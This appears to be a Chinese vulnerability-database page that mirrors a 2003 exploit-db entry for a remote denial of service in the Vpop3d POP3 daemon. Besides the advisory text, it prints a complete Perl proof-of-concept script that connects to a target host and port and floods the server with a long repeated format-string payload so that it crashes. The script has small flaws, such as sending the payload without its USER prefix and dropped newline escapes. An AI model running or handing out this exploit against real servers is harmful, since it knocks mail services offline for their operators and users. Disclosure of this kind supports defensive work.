Vpop3d – Remote Denial of Service

27次阅读
没有评论

Vpop3d – Remote Denial of Service

漏洞ID 1054114 漏洞类型
发布时间 2003-08-22 更新时间 2003-08-22
Vpop3d - Remote Denial of ServiceCVE编号 N/A
Vpop3d - Remote Denial of ServiceCNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23053
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8473/info

A vulnerability has been reported for Vpop3d that may make it prone to denial of service attacks. The problem is said to occur due to the affected daemon failing to sufficiently handle USER name values of excessive length. As a result, if a malicious packet is received, after a specific amount of time the affected server may abnormally terminate.

#!/usr/bin/perl

#vpop3d Denial Of Service..
#Proof of Concept script..
#Deadbeat, uk2sec..
#e: [email protected]
#e: [email protected]

use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
if(!$ARGV[1]){
        die "usage: perl $0 <host> <port>n";
}
$dos = "%s%s"x5000;
$req = "USER $dos";
$sox = IO::Socket::INET->new(
        Proto=>"tcp",
        PeerPort=>$port,
        PeerAddr=>$host
)or die "can't connect to $host : $portn";
sleep 2;
print $sox $dos;
sleep 1;
print "done..vpop3d should lock now :)n";

相关推荐: Cisco CBOS服务拒绝漏洞

Cisco CBOS服务拒绝漏洞 漏洞ID 1205176 漏洞类型 未知 发布时间 2001-10-18 更新时间 2001-10-18 CVE编号 CVE-2001-0752 CNNVD-ID CNNVD-200110-073 漏洞平台 N/A CVSS评…

正文完
 0